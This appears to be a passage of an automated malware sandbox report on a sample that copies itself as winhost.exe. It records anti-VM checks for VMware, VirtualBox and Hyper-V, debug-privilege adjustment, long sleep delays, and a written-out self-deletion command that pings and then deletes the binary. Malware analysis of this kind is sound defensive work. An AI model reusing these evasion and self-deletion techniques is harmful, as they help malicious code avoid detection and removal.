                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile opened: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\Jump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile opened: C:\Users\user\AppData\Local\Temp\Microsoft\Jump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile opened: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe:Zone.IdentifierJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile opened: C:\Users\user\Jump to behavior
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeBinary or memory string: \vboxmrxnp.dll=cmd.exe /c ping 0 -n 2 & del "
                  Source: winhost.exe, 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmpBinary or memory string: #"C:\Windows\system32\vmGuestLib.dll
                  Source: winhost.exe, 00000010.00000002.722699678.000000001EB70000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_
                  Source: winhost.exeBinary or memory string: \vboxmrxnp.dll
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.669454149.000000001B9B0000.00000002.00000001.sdmp, winhost.exe, 00000008.00000002.680419646.000000001B750000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.703488772.000000001B870000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.710896997.000000001BA00000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.723244194.000000001B050000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                  Source: winhost.exe, 00000013.00000002.729582154.000000001E32C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWc`
                  Source: winhost.exe, 00000013.00000002.729706275.000000001E368000.00000004.00000001.sdmpBinary or memory string: \??\C:\Windows\system32\vmGuestLib.dllxe
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeBinary or memory string: vmware
                  Source: winhost.exe, 00000013.00000002.729473552.000000001E2F0000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_@
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.665033389.0000000000FEA000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.669454149.000000001B9B0000.00000002.00000001.sdmp, winhost.exe, 00000008.00000002.680419646.000000001B750000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.703488772.000000001B870000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.710896997.000000001BA00000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.723244194.000000001B050000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.669454149.000000001B9B0000.00000002.00000001.sdmp, winhost.exe, 00000008.00000002.680419646.000000001B750000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.703488772.000000001B870000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.710896997.000000001BA00000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.723244194.000000001B050000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                  Source: winhost.exe, 00000010.00000002.722800429.000000001EBC6000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\v
                  Source: winhost.exe, 00000013.00000002.729659475.000000001E357000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: winhost.exe, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeBinary or memory string: \vmGuestLib.dll
                  Source: winhost.exe, 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmpBinary or memory string: C:\Windows\vboxmrxnp.dll
                  Source: winhost.exe, 00000008.00000002.682847339.000000001E7DC000.00000004.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.709843837.000000001E8EC000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.722699678.000000001EB70000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.669454149.000000001B9B0000.00000002.00000001.sdmp, winhost.exe, 00000008.00000002.680419646.000000001B750000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.703488772.000000001B870000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.710896997.000000001BA00000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.723244194.000000001B050000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe'Jump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe' Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000 Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000 Jump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe'Jump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe' Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
